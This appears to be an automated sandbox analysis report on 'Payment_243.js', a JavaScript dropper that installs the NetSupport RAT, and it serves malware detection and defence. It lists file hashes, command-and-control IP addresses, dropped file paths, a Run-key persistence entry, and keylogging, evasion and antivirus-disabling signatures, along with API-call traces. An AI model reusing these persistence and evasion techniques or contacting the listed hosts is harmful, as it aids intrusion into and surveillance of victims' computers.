Edit tour

Windows Analysis Report
Payment_243.js

Overview

General Information

Sample name:	Payment_243.js
Analysis ID:	1591022
MD5:	19cef6a2f4055703922f3e8fd2c92fb9
SHA1:	e6ccef88b3cbba0424a39edab01697716fd8d813
SHA256:	d0480e3927154036684ba2a60dba9576234bae2aa484294c3d925923de55196f
Infos:

Detection

NetSupport RAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Benign windows process drops PE files

Multi AV Scanner detection for dropped file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Contains functionalty to change the wallpaper

Delayed program exit found

Deletes itself after installation

JavaScript source code contains functionality to generate code involving HTTP requests or file downloads

JavaScript source code contains functionality to generate code involving a shell, file or stream

Sigma detected: Script Initiated Connection to Non-Local Network

Sigma detected: WScript or CScript Dropper

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables security privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

Found evasive API chain (date check)

Found evasive API chain checking for process token information

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

PE file does not import any functions

Potential key logger detected (key state polling based)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: DNS Query To Remote Access Software Domain From Non-Browser App

Sigma detected: Script Initiated Connection

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Tries to disable installed Antivirus / HIPS / PFW

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Keylogger Generic

Yara detected NetSupport remote tool

Classification

Process Tree

System is w7x64

wscript.exe (PID: 3364 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_243.js" MD5: 045451FA238A75305CC26AC982472367)

client32.exe (PID: 3748 cmdline: "C:\ProgramData\x225qa0\client32.exe" MD5: C4F1B50E3111D29774F7525039FF7086)

client32.exe (PID: 3908 cmdline: "C:\ProgramData\x225qa0\client32.exe" MD5: C4F1B50E3111D29774F7525039FF7086)

client32.exe (PID: 3992 cmdline: "C:\ProgramData\x225qa0\client32.exe" MD5: C4F1B50E3111D29774F7525039FF7086)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\ProgramData\x225qa0\client32.exe	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\ProgramData\x225qa0\pcicapi.dll	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\ProgramData\x225qa0\PCICHEK.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\ProgramData\x225qa0\HTCTL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\ProgramData\x225qa0\TCCTL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\ProgramData\x225qa0\PCICL32.DLL	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
C:\ProgramData\x225qa0\PCICL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Click to see the 2 entries

Memory Dumps

Source	Rule	Description	Author
00000006.00000000.529790878.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000004.00000002.670588209.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000004.00000000.516821762.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000006.00000002.530116570.00000000111E2000.00000004.00000001.01000000.00000009.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000008.00000002.547582545.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000006.00000002.530048197.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000004.00000002.670615184.000000000201E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000008.00000000.547201521.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000006.00000002.530108204.0000000011194000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000006.00000002.530108204.0000000011194000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000008.00000002.547693910.0000000011194000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000008.00000002.547693910.0000000011194000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000008.00000002.547708086.00000000111E2000.00000004.00000001.01000000.00000009.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000004.00000002.671102639.0000000071610000.00000002.00000001.01000000.0000000D.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Process Memory Space: client32.exe PID: 3748	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: client32.exe PID: 3748	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Process Memory Space: client32.exe PID: 3908	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: client32.exe PID: 3908	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Process Memory Space: client32.exe PID: 3992	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: client32.exe PID: 3992	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author
6.2.client32.exe.73620000.5.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
8.2.client32.exe.71660000.4.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
4.2.client32.exe.aa0000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
6.0.client32.exe.aa0000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
6.2.client32.exe.aa0000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
6.2.client32.exe.71660000.4.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
8.2.client32.exe.73620000.5.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
8.2.client32.exe.111b8c68.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
8.2.client32.exe.111b8c68.2.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
4.2.client32.exe.71660000.5.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
4.2.client32.exe.73620000.6.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
4.2.client32.exe.111b8c68.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
4.2.client32.exe.111b8c68.2.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
8.2.client32.exe.aa0000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
6.2.client32.exe.111b8c68.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
6.2.client32.exe.111b8c68.2.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
4.0.client32.exe.aa0000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
8.0.client32.exe.aa0000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
4.2.client32.exe.715d0000.4.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
6.2.client32.exe.11000000.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
6.2.client32.exe.11000000.1.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
4.2.client32.exe.11000000.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
4.2.client32.exe.11000000.1.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
8.2.client32.exe.11000000.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
8.2.client32.exe.11000000.1.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Click to see the 20 entries

Sigma Signatures

System Summary

Sigma detected: Script Initiated Connection to Non-Local Network

Source: Network Connection

Author: frack113, Florian Roth: Data: DestinationIp: 45.155.249.215, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 3364, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_243.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_243.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_243.js", ProcessId: 3364, ProcessName: wscript.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\x225qa0\client32.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\wscript.exe, ProcessId: 3364, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\(Default)

Sigma detected: DNS Query To Remote Access Software Domain From Non-Browser App

Source: DNS query

Author: frack113, Connor Martin: Data: Image: C:\ProgramData\x225qa0\client32.exe, QueryName: geo.netsupportsoftware.com

Sigma detected: Script Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 45.155.249.215, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 3364, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_243.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_243.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_243.js", ProcessId: 3364, ProcessName: wscript.exe

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

Author: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Windows\System32\wscript.exe, ProcessId: 3364, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Suricata Signatures

ETPRO MALWARE NetSupport RAT CnC Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T16:21:07.992710+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.22	49166	185.157.213.71	443	TCP

Joe Security ANOMALY Microsoft Office HTTP activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T16:21:08.602563+0100	1810004	1	Potentially Bad Traffic	192.168.2.22	49165	45.155.249.215	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\x225qa0\HTCTL32.DLL	ReversingLabs: Detection: 15%
Source: C:\ProgramData\x225qa0\PCICHEK.DLL	ReversingLabs: Detection: 18%
Source: C:\ProgramData\x225qa0\PCICL32.DLL	ReversingLabs: Detection: 18%
Source: C:\ProgramData\x225qa0\client32.exe	ReversingLabs: Detection: 31%
Source: C:\ProgramData\x225qa0\pcicapi.dll	ReversingLabs: Detection: 15%
Source: C:\ProgramData\x225qa0\remcmdstub.exe	ReversingLabs: Detection: 28%

Source: C:\ProgramData\x225qa0\client32.exe

Code function: 4_2_110ADA40 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,

4_2_110ADA40

Source: C:\Windows\System32\wscript.exe

File opened: C:\PROGRA~3\x225qa0\msvcr100.dll

Jump to behavior

Source:	Binary string: msvcr100.i386.pdb source: client32.exe, client32.exe, 00000006.00000002.530287670.000000006A0E1000.00000020.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.547818882.000000006A0E1000.00000020.00000001.01000000.0000000B.sdmp
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000006.00000002.530108204.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000008.00000002.547693910.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: client32.exe, 00000004.00000002.671102639.0000000071610000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\Full\pcichek.pdb source: client32.exe, 00000004.00000002.671173714.0000000073622000.00000002.00000001.01000000.0000000A.sdmp, client32.exe, 00000006.00000002.530359890.0000000073622000.00000002.00000001.01000000.0000000A.sdmp, client32.exe, 00000008.00000002.547917343.0000000073622000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: E:\nsmsrc\nsm\1200\1200\client32\Release\client32.pdb source: client32.exe, 00000004.00000002.670588209.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000004.00000000.516821762.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000006.00000000.529790878.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000006.00000002.530048197.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000008.00000002.547582545.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000008.00000000.547201521.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, client32.exe.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: client32.exe, 00000004.00000002.671102639.0000000071610000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: client32.exe, 00000004.00000002.671142081.0000000071665000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000006.00000002.530337343.0000000071665000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000008.00000002.547879856.0000000071665000.00000002.00000001.01000000.0000000C.sdmp, pcicapi.dll.0.dr
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000006.00000002.530108204.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000008.00000002.547693910.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.dr

Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	4_2_111273E0
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	4_2_1102D9F4
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	4_2_1102DD21
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_1110BD70 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	4_2_1110BD70
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	4_2_110663B0
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	4_2_1106ABD0
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A13CA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,	6_2_6A13CA9B
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A140B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,	6_2_6A140B33
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A140F84 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,	6_2_6A140F84
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A13EFE1 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,	6_2_6A13EFE1
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A140702 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,	6_2_6A140702
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A13C775 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,	6_2_6A13C775
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A13DA38 _findfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_seterrormode,SetErrorMode,	6_2_6A13DA38
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A13F8B5 _stat64i32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,	6_2_6A13F8B5
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A13DF35 _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,	6_2_6A13DF35
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A107C6D _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,	6_2_6A107C6D
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A13FD86 _stat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,	6_2_6A13FD86
